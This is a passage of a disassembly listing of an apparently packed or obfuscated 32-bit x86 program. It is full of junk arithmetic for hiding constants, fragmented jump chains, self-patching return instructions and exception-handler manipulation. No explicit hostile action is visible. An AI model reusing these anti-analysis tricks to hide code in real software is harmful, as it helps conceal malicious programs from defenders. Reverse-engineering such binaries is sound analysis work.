		xchg	ebp, [esp+4+var_4]
		push	edi
		jmp	loc_44664A
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------

loc_4444AA:				; CODE XREF: y2kk37jd:00451E29j
		test	edx, ebx
		jmp	loc_4426D6

; =============== S U B	R O U T	I N E =======================================



sub_4444B1	proc near		; CODE XREF: y2kk37jd:loc_43FC23p
					; y2kk37jd:00449E20j

arg_0		= dword	ptr  4

		xchg	ebx, [esp+0]
		pop	ebx
		add	eax, 31E8B93Fh
		xor	eax, 0F24FF03Dh
		mov	edx, [esp-4+arg_0]
		push	edx
		jmp	loc_44F9AC
sub_4444B1	endp


; =============== S U B	R O U T	I N E =======================================



sub_4444CA	proc near		; CODE XREF: sub_43F75D+133E0j
					; sub_4587AAp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043F8A3 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00443825 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444B3A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004589C6 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00459E15 SIZE 00000013 BYTES

		xchg	edx, [esp-4+arg_0]
		pop	edx
		jb	loc_43F8A3
		xchg	edi, [esp-8+arg_4]
		jmp	loc_459E15
sub_4444CA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4444DC:				; CODE XREF: y2kk37jd:loc_445A4Cj
		mov	eax, [edx]
		jmp	loc_45ACDF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445EF2

loc_4444E3:				; CODE XREF: sub_445EF2+8j
		mov	edi, edx
		xchg	edi, [esp+0]
		push	esi
		push	604CBD19h
		pop	esi
		and	esi, 0C1A161F6h
		xor	esi, 0DF42B53Eh
		jmp	loc_450FDF
; END OF FUNCTION CHUNK	FOR sub_445EF2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_444500:				; CODE XREF: sub_44107E+136B3j
		jnz	loc_446831
		jmp	loc_43E31B
; END OF FUNCTION CHUNK	FOR sub_44107E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_44450B:				; CODE XREF: sub_445787:loc_44D7B3j
		jnz	loc_43B30D

loc_444511:				; CODE XREF: sub_445226+16408j
		jmp	nullsub_270
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------

loc_444516:				; CODE XREF: y2kk37jd:004590BCj
		jmp	loc_444860
; ---------------------------------------------------------------------------
		rol	ebx, 9
		xchg	ebx, edx
		jmp	loc_43B30D
; ---------------------------------------------------------------------------

loc_444525:				; CODE XREF: y2kk37jd:0044DBDBj
		js	loc_4525C0
		or	eax, edx
		jz	loc_457740
		sbb	ecx, eax

loc_444535:				; CODE XREF: y2kk37jd:loc_45A121j
		push	ebx
		push	33675AB7h
		pop	ebx
		rol	ebx, 17h
		jmp	loc_4514F3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_444544:				; CODE XREF: sub_43C851+E39j
		push	esi
		push	48C707B0h
		pop	esi
		and	esi, 6DA10F0h
		add	esi, 64C8F509h
		jmp	loc_4560E2
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BA66

loc_44455C:				; CODE XREF: sub_43BA66+17j
		mov	eax, ds:dword_4470B8
		mov	eax, [eax]

loc_444563:				; CODE XREF: y2kk37jd:loc_44A64Fj
		mov	ds:dword_4470C4, eax
		xor	eax, eax
		jmp	loc_43B99A
; END OF FUNCTION CHUNK	FOR sub_43BA66
; ---------------------------------------------------------------------------

loc_44456F:				; CODE XREF: y2kk37jd:00449CDBj
		jz	loc_44F87E
		jmp	loc_45B185
; ---------------------------------------------------------------------------

loc_44457A:				; DATA XREF: sub_44A298-25BEo
		pop	edi
		pop	ecx
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_44457F:				; CODE XREF: sub_44AC89-B70Ej
					; y2kk37jd:0044399Bj ...
		pop	large dword ptr	fs:0
		jmp	loc_44CF1D
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
		shl	esi, 3
		jmp	sub_458101
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_444593:				; CODE XREF: sub_445226-7A64j
					; y2kk37jd:loc_45A555j
		call	nullsub_16
		retn
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_444599:				; CODE XREF: sub_453867+862Dj
		jmp	nullsub_414
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455677

loc_44459E:				; CODE XREF: sub_455677+4j
		push	esi
		push	0F0DD114h
		pop	esi
		sub	esi, 5BB65A0h
		add	esi, 0F6F1E22Ch
		xchg	esi, [esp+4+var_4]
		jmp	sub_4577FE
; END OF FUNCTION CHUNK	FOR sub_455677
; ---------------------------------------------------------------------------

loc_4445B9:				; CODE XREF: y2kk37jd:00440459j
		lea	eax, sub_44F641
		mov	byte ptr [eax],	0C3h
		jmp	sub_44F641

; =============== S U B	R O U T	I N E =======================================



sub_4445C7	proc near		; CODE XREF: sub_4033CB+AAp
					; sub_404C4E+B9p ...
		call	sub_4445D2
		jmp	ds:off_41E08C
sub_4445C7	endp


; =============== S U B	R O U T	I N E =======================================



sub_4445D2	proc near		; CODE XREF: sub_4445C7p
					; sub_45181D-C113j ...
		pop	edx
		push	offset loc_45A612
		jmp	nullsub_38
sub_4445D2	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B55D

loc_4445DD:				; CODE XREF: sub_44B55D+8633j
		and	ebx, edx
		add	edx, 0C6DC3C86h
		jmp	loc_43F5A4
; END OF FUNCTION CHUNK	FOR sub_44B55D
; ---------------------------------------------------------------------------

loc_4445EA:				; CODE XREF: y2kk37jd:0045AA48j
		pushf

loc_4445EB:				; CODE XREF: y2kk37jd:loc_45AA3Bj
		or	eax, 75C8821Dh
		rol	eax, 2
		jb	loc_453D9F

loc_4445FA:				; CODE XREF: y2kk37jd:004501DBj
		jmp	loc_455E7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_4445FF:				; CODE XREF: sub_44CDD5+2C85j
		jmp	loc_44F447
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_444604:				; CODE XREF: sub_4458DD:loc_44FC4Dj
		sub	ebx, 0B4EB4DE0h
		test	ebx, 1000h
		jmp	loc_4531C6
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E1E9

loc_444615:				; CODE XREF: sub_43E07B+1C11j
					; sub_43E1E9:loc_4412B4j ...
		jmp	loc_44375B
; ---------------------------------------------------------------------------

loc_44461A:				; CODE XREF: sub_43E1E9+3266j
					; sub_43E07B+1A2B6j
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_43E1E9

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44461D	proc near		; CODE XREF: sub_4450D1-8E4Dp
					; y2kk37jd:0043C913p ...

; FUNCTION CHUNK AT 0045A507 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B52B SIZE 0000000D BYTES

		push	ebp
		mov	ebp, esp
		jmp	loc_45A507
sub_44461D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_444625:				; CODE XREF: sub_44AC89:loc_455488j
		jnz	loc_44E6DF
		jmp	loc_43DBF7
; END OF FUNCTION CHUNK	FOR sub_44AC89
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_233. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F0B

loc_444631:				; CODE XREF: sub_450F0B+7j
		jmp	loc_441C34
; END OF FUNCTION CHUNK	FOR sub_450F0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_444636:				; CODE XREF: sub_43F2F2-2BAj
		jmp	sub_4526B7
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B5AF

loc_44463B:				; CODE XREF: sub_43B5AF+6j
		jmp	loc_43C558
; END OF FUNCTION CHUNK	FOR sub_43B5AF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_444640:				; CODE XREF: sub_4597AE-1AF0Fj
		push	2314FD56h
		pop	edx
		add	edx, 59D29864h
		test	edx, 4000h
		jmp	loc_441130
; END OF FUNCTION CHUNK	FOR sub_4597AE
; ---------------------------------------------------------------------------

loc_444657:				; CODE XREF: y2kk37jd:loc_450C49j
		sbb	eax, 20F94D04h
		jmp	loc_440B51
; ---------------------------------------------------------------------------
		pop	eax
		jmp	sub_45609B
; ---------------------------------------------------------------------------
		push	90798861h
		pop	edx
		or	edx, 8478CD15h
		rol	edx, 6
		and	edx, 0FCD3E24Bh
		xor	edx, 0F5C5B76Fh
		call	sub_44F68D

loc_444688:				; CODE XREF: y2kk37jd:0045BCC4j
		jmp	sub_442C3E
; ---------------------------------------------------------------------------

loc_44468D:				; CODE XREF: y2kk37jd:004523F1j
		jnb	loc_456313

; =============== S U B	R O U T	I N E =======================================



sub_444693	proc near		; CODE XREF: sub_454539:loc_4504B7p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043EF42 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044651F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BD85 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044C0C8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D606 SIZE 00000008 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	0CF409158h
		pop	eax

loc_44469D:				; CODE XREF: y2kk37jd:00440B34j
		or	eax, 0CDB5C472h
		rol	eax, 16h
		jmp	loc_43EF42
sub_444693	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		adc	ebx, esi
		add	ecx, 0C7E7FA54h
		jmp	sub_450203
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454539

loc_4446B8:				; CODE XREF: sub_454539-B9DEj
		jnb	loc_4566D9
		jg	loc_4467B3
		jmp	loc_4584F9
; END OF FUNCTION CHUNK	FOR sub_454539
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451464

loc_4446C9:				; CODE XREF: sub_451464:loc_4405E9j
		jz	loc_440E87
		jmp	loc_441B6E
; END OF FUNCTION CHUNK	FOR sub_451464
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_4446D4:				; CODE XREF: sub_43C851:loc_44D0CBj
		jz	loc_43EEB0
		jmp	loc_43D836
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
		sbb	ebp, 0B5CC8553h
		jmp	loc_43F4CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44346B

loc_4446EA:				; CODE XREF: sub_44346B+10421j
		jbe	loc_442750

loc_4446F0:				; CODE XREF: sub_44346B:loc_450919j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44223F
		jmp	loc_43EDD8
; END OF FUNCTION CHUNK	FOR sub_44346B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_444701:				; CODE XREF: sub_454C24-6505j
		call	sub_43B67C

loc_444706:				; CODE XREF: y2kk37jd:0045912Dj
		jmp	sub_4597AE
; END OF FUNCTION CHUNK	FOR sub_454C24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B508

loc_44470B:				; CODE XREF: sub_44B508:loc_4438E7j
		push	ecx
		mov	esp, ebp
		pop	ebp
		push	495F3B86h
		pop	eax
		and	eax, 0F7EFEB26h
		or	eax, 0B6593EACh
		add	eax, 8E50B22h
		jmp	loc_451045
; END OF FUNCTION CHUNK	FOR sub_44B508

; =============== S U B	R O U T	I N E =======================================



sub_44472C	proc near		; CODE XREF: sub_44619E+Dp
					; y2kk37jd:0045A264j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043F641 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004412FE SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004566B5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456DD3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045869C SIZE 00000011 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	eax, [ebp-18h]
		jmp	loc_43F641
sub_44472C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEAB

loc_444738:				; CODE XREF: sub_44CEAB+4j
		add	eax, [esp+0]
		adc	edx, [esp+8+var_4]
		call	sub_44A089
		push	edi
		push	0BED7ABEBh
		pop	edi

loc_44474B:				; CODE XREF: sub_443992+4j
		add	edi, 0BD3D1B80h
		jmp	loc_445629
; END OF FUNCTION CHUNK	FOR sub_44CEAB
; ---------------------------------------------------------------------------

loc_444756:				; DATA XREF: sub_4417E6:loc_4417E7o
		push	2EBEF5D5h
		pop	ebx
		add	ebx, 5E083788h
		or	ebx, 0A23C0A5Bh
		add	ebx, 51459033h
		jmp	loc_44BF8A

; =============== S U B	R O U T	I N E =======================================



sub_444773	proc near		; CODE XREF: y2kk37jd:004417F6j
					; sub_449C4F+1234Cp
		xchg	esi, [esp+0]
		pop	esi
		add	eax, 9CD070C6h
		add	eax, ebp
		add	eax, 8FBF289Ch
		mov	eax, [eax]
		push	offset sub_44B589
		jmp	nullsub_150
sub_444773	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CC31

loc_444791:				; CODE XREF: sub_44CC31+348j
		push	offset loc_4430C5
		jmp	nullsub_251
; END OF FUNCTION CHUNK	FOR sub_44CC31

; =============== S U B	R O U T	I N E =======================================



sub_44479B	proc near		; DATA XREF: y2kk37jd:004492B4o

; FUNCTION CHUNK AT 0043D5A9 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004597F0 SIZE 00000005 BYTES

		add	ecx, 2F8040D1h
		mov	[ecx], eax
		pop	ecx
		mov	eax, [ebp-18h]
		mov	eax, [eax+18h]
		dec	eax
		jmp	loc_4597F0
sub_44479B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jmp	loc_4565CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_4447B5:				; CODE XREF: sub_44B814+9B7Dj
		jnz	loc_44FAED
		push	esi
		push	38C86692h
		pop	esi
		xor	esi, ds:4000F0h
		add	esi, 3EFF1A45h
		xchg	esi, [esp+0]
		jmp	sub_4577FE
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_4447D7:				; CODE XREF: sub_43F2F2+AE5Aj
		jmp	loc_44B6AE
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
dword_4447DC	dd 0			; DATA XREF: sub_443BAF-330w
					; sub_45A961:loc_4458FCr ...
; ---------------------------------------------------------------------------

loc_4447E0:				; CODE XREF: y2kk37jd:00453F63j
		jmp	sub_442C3E
; ---------------------------------------------------------------------------

loc_4447E5:				; CODE XREF: y2kk37jd:0043F7F6j
		jmp	loc_45694E

; =============== S U B	R O U T	I N E =======================================



sub_4447EA	proc near		; CODE XREF: sub_41AB0C+299p
					; y2kk37jd:0044243Bj
					; DATA XREF: ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043D07B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043ECE0 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004421BD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442446 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00445CB1 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004463D5 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044668D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446F78 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00447500 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447828 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449CBB SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044BCE7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C597 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045038F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450E9E SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00451342 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004521DB SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004523B8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454068 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456520 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457EED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045925C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B00E SIZE 0000000B BYTES

		push	eax
		push	0DDF6AF0Fh
		sbb	eax, 0BDC50AE0h
		jmp	loc_44668D
sub_4447EA	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4447FB	proc near		; DATA XREF: y2kk37jd:loc_43BCB3o
		push	57793B0Ah
		pop	ecx
		sub	ecx, 9B9B2803h
		push	offset sub_43ECB4
		jmp	nullsub_464
sub_4447FB	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_444811:				; CODE XREF: sub_45B7AA+39j
		xor	edi, 5A923133h
		add	edi, 8E3FB0FDh
		mov	[edi], eax
		pop	edi
		jmp	loc_4428C0
; END OF FUNCTION CHUNK	FOR sub_45B7AA

; =============== S U B	R O U T	I N E =======================================



sub_444825	proc near		; CODE XREF: y2kk37jd:loc_43CBBCj
					; sub_4509A0+340Fp ...

; FUNCTION CHUNK AT 00440D09 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448B06 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448B45 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00450512 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004578F6 SIZE 0000000D BYTES

		xchg	edx, [esp+0]
		pop	edx
		pop	edx
		cmp	dword ptr [ebp-4], 0
		jz	loc_45544F
		jmp	loc_450512
sub_444825	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457468

loc_444839:				; CODE XREF: sub_457468+Cj
		pop	edi
		lea	eax, sub_4526A0
		mov	byte ptr [eax],	0C3h
		jmp	sub_4526A0
; END OF FUNCTION CHUNK	FOR sub_457468
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4526A0

loc_444848:				; CODE XREF: sub_4526A0+1j
		mov	eax, [esp+0]
		push	edx
		call	sub_4415B8
		mov	eax, 0C7CC2482h
		call	sub_442C3E
		jmp	loc_441D7D
; END OF FUNCTION CHUNK	FOR sub_4526A0
; ---------------------------------------------------------------------------

loc_444860:				; CODE XREF: y2kk37jd:loc_444516j
		jz	loc_440BB7
		jl	loc_455C68
		adc	edx, 124D6B2h
		sbb	esi, 1E840590h
		jmp	loc_440BB1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_44487D:				; CODE XREF: sub_4597AE:loc_441130j
		jz	loc_43CA69

loc_444883:				; CODE XREF: y2kk37jd:0044EB1Ej
		jmp	loc_45C1BF
; END OF FUNCTION CHUNK	FOR sub_4597AE
; ---------------------------------------------------------------------------
		jns	loc_44C22D
		sub	edx, ebp
		add	ecx, edi
		mov	edi, [ecx]
		jmp	loc_43CA69

; =============== S U B	R O U T	I N E =======================================



sub_444899	proc near		; CODE XREF: sub_445787:loc_441EC7j
					; y2kk37jd:0044CCB8j ...

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043BBCF SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00440692 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00440850 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00441119 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F258 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00459EB1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BB50 SIZE 00000005 BYTES

		pop	edx
		jns	loc_440692
		mov	eax, [esp+8+var_8]
		push	ebx
		not	ebx
		jmp	loc_441119
sub_444899	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449DFE

loc_4448AB:				; CODE XREF: sub_449DFE-A119j
		cmp	dword ptr [ebp-4], 0
; END OF FUNCTION CHUNK	FOR sub_449DFE
; START	OF FUNCTION CHUNK FOR sub_456D3F

loc_4448AF:				; CODE XREF: sub_456D3F:loc_45B08Aj
		jz	loc_43CC4C
		jmp	loc_450761
; END OF FUNCTION CHUNK	FOR sub_456D3F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440DC1

loc_4448BA:				; CODE XREF: sub_440DC1:loc_45A821j
		jnz	loc_4558C7
		retn
; END OF FUNCTION CHUNK	FOR sub_440DC1

; =============== S U B	R O U T	I N E =======================================



sub_4448C1	proc near		; CODE XREF: sub_459AB0+Ep

; FUNCTION CHUNK AT 00445874 SIZE 00000005 BYTES

		mov	eax, large fs:0

loc_4448C8:				; CODE XREF: sub_448587+Ej
					; sub_450D34+4j
		push	offset sub_448587
		jmp	loc_445874
sub_4448C1	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_127. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E20

loc_4448D3:				; CODE XREF: sub_454E20+3425j
		jmp	loc_43F44B
; END OF FUNCTION CHUNK	FOR sub_454E20
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449E69

loc_4448D8:				; CODE XREF: sub_449E69-2016j
		jmp	loc_443653
; END OF FUNCTION CHUNK	FOR sub_449E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DDC

loc_4448DD:				; CODE XREF: sub_442DDC+Aj
		jmp	loc_44FBB7
; END OF FUNCTION CHUNK	FOR sub_442DDC

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4448E2	proc near		; CODE XREF: sub_445C40:loc_443902p
					; sub_446B6E-E0Dj ...

var_2BC		= byte ptr -2BCh
var_26F		= byte ptr -26Fh
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C420 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043C658 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CC11 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0043CF5D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043DB61 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EBF9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043EFC7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043F1F7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F6F3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FD2E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043FF8A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00440143 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004428C5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004433D5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443C18 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00443D9C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00443EE5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444486 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044499D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444F03 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445E87 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004462BD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447027 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00447092 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004471AE SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00447732 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044786E SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00447965 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447FCD SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00449342 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004494AD SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044A765 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044A801 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044B1DD SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044B27E SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044B607 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044B651 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C1D6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044C542 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044CAEC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044CD13 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044D03F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044DAB9 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044DF40 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044E03D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E12B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044E2CC SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044E39F SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044EB39 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044EF17 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044FB46 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004501AF SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00450334 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 004505C5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045062B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450943 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004511CB SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045185C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004521CF SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004528EF SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00452ACA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452D5A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453208 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453366 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00453DCE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454198 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00454EF4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045537E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455482 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004558AC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00455A9F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00455F17 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456467 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00456751 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456766 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456B8D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00456E67 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457DA6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00458B60 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004591FA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00459BDA SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00459BFD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A6DE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AA4D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045B6BE SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045BF35 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045C49A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045C66A SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	ebp
		mov	ebp, ecx
		xchg	ebp, [esp+14h+var_14]
		mov	[ebp+var_4], eax
		mov	eax, [ebp+var_4]
		jmp	loc_44FB46
sub_4448E2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446718

